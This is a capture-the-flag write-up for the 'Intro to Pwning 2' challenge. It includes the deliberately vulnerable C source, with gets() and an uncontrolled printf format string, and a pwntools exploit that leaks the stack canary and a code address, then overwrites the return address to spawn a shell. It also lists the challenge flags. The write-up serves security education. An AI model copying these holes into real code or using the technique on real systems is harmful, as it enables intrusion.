## Intro to Pwning 2

### Description

_**Category:** Pwn  
**Difficulty:** Baby  
**Author:** LiveOverflow  
**Dependencies: Intro to Pwning 1_  

_This is a introductory challenge for exploiting Linux binaries with memory
corruptions. Nowodays there are quite a few mitigations that make it not as
straight forward as it used to be. So in order to introduce players to pwnable
challenges, [LiveOverflow created a video walkthrough](https://www.youtube.com/watch?v=hhu7vhmuISY)
of the first challenge. An [alternative writeup](https://static.allesctf.net/Tutorial_Intro_Pwn.html)
can also be found by 0x4d5a. More resources can also be found
[here](https://github.com/LiveOverflow/pwn_docker_example)._

Service running at: `hax1.allesctf.net:9101`

**Files:**
* [intro_pwn.zip](../intro_pwn.zip)  
  - [pwn2](../pwn2)  
	  - [Dockerfile](Dockerfile)  
    - [flag](flag)  
    - [pwn2](pwn2)  
    - [pwn2.c](pwn2.c)  
    - [ynetd](ynetd)  

**pwn2.c:**
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>

#ifndef PASSWORD
    #define PASSWORD "CSCG{FLAG_FROM_STAGE_1}"
#endif

// pwn2: gcc pwn2.c -o pwn2

// --------------------------------------------------- SETUP

void ignore_me_init_buffering() {
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void kill_on_timeout(int sig) {
  if (sig == SIGALRM) {
  	printf("[!] Anti DoS Signal. Patch me out for testing.");
    _exit(0);
  }
}

void ignore_me_init_signal() {
	signal(SIGALRM, kill_on_timeout);
	alarm(60);
}

// just a safe alternative to gets()
size_t read_input(int fd, char *buf, size_t size) {
  size_t i;
  for (i = 0; i < size-1; ++i) {
    char c;
    if (read(fd, &c, 1) <= 0) {
      _exit(0);
    }
    if (c == '\n') {
      break;
    }
    buf[i] = c;
  }
  buf[i] = '\0';
  return i;
}

// --------------------------------------------------- MENU

void WINgardium_leviosa() {
    printf("┌───────────────────────┐\n");
    printf("│ You are a Slytherin.. │\n");
    printf("└───────────────────────┘\n");
    system("/bin/sh");
}

void check_password_stage1() {
    char read_buf[0xff];
    printf("Enter the password of stage 1:\n");
    memset(read_buf, 0, sizeof(read_buf));
    read_input(0, read_buf, sizeof(read_buf));
    if(strcmp(read_buf, PASSWORD) != 0) {
        printf("-10 Points for Ravenclaw!\n");
        _exit(0);
    } else {
        printf("+10 Points for Ravenclaw!\n");
    }
}

void welcome() {
    char read_buf[0xff];
    printf("Enter your witch name:\n");
    gets(read_buf);
    printf("┌───────────────────────┐\n");
    printf("│ You are a Ravenclaw!  │\n");
    printf("└───────────────────────┘\n");
    printf(read_buf);
}


void AAAAAAAA() {
    char read_buf[0xff];
    printf(" enter your magic spell:\n");
    gets(read_buf);
    if(strcmp(read_buf, "Expelliarmus") == 0) {
        printf("~ Protego!\n");
    } else {
        printf("-10 Points for Ravenclaw!\n");
        _exit(0);
    }
}
// --------------------------------------------------- MAIN

void main(int argc, char* argv[]) {
	  ignore_me_init_buffering();
	  ignore_me_init_signal();

    check_password_stage1();

    welcome();
    AAAAAAAA();
}



```

---

### Solution

Running `checksec` we see that all standard mitigations are enabled:

```
$ checksec pwn2
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

```

Getting through `check_password_stage1` is trivial. Just supply the flag
achieved in Introduction to Pwning 1.

Our goal is to redirect execution to `WINguardium_leviosa` which spawns a shell.
In `welcome` we have a `printf` call that takes a buffer as argument that we
control in content of through the prior call to `gets`.

The plan is to leak the stack canary and a reference to the code segment through
the call to `printf`, overwrite the canary with the original value and overwrite
the return address called after evaluation of `AAAAAAAA` is done, with the
address of `WINguardium_leviosa`, which we can find if we are able to leak a
refference to an address somewhere in the code segment.

If we send 41 `%p`'s we will get both the canary and a code reference. We attach
radare to the process to calculate the address of `WINguardium_leviosa` from the
leaked address. We get a leaked address of `0x55c3f5205574` and an address of
`WINguardium_leviosa` of `0x55c3f5205343`, so our refference to the code is
`0x231` bytes after the `WIN` function.

We can also leak the stack canary and with help from `gets` in the `AAAAAAAA`
function, we can overwrite the stack canary, the retur address with an arbitrary
`ret` instruction to align the stack, followed by the address of `WIN`.

The exploit looks like this:
```python
from pwn import *

STAGE_1_PASS = "CSCG{NOW_PRACTICE_MORE}"
FORMATSTRING = "|".join(["%p" for _ in range(41)])

conn = remote("hax1.allesctf.net", 9101)

conn.recvuntil("Enter the password of stage 1:")

conn.sendline(STAGE_1_PASS)
conn.recvuntil("Enter your witch name:")
#raw_input("attach to {}".format(str(conn.proc.pid)))
conn.sendline(FORMATSTRING)
LEAK = conn.recvuntil("enter your magic spell:").split("|")

CANARY = int(LEAK[-3], 16)
CODE_REF = int(LEAK[-1].split(" ")[0], 16)
RET_GADGET = CODE_REF + 0xc
WIN = CODE_REF - 0x231

CANARY_OFFSET = "A"*cyclic_find("cnaa")
RET_OFFSET = "B"*cyclic_find("caaa")
conn.sendline("Expelliarmus\x00" + CANARY_OFFSET + p64(CANARY) + RET_OFFSET + \
        p64(RET_GADGET) + p64(WIN))

conn.interactive()
```

CSCG{NOW_GET_VOLDEMORT}
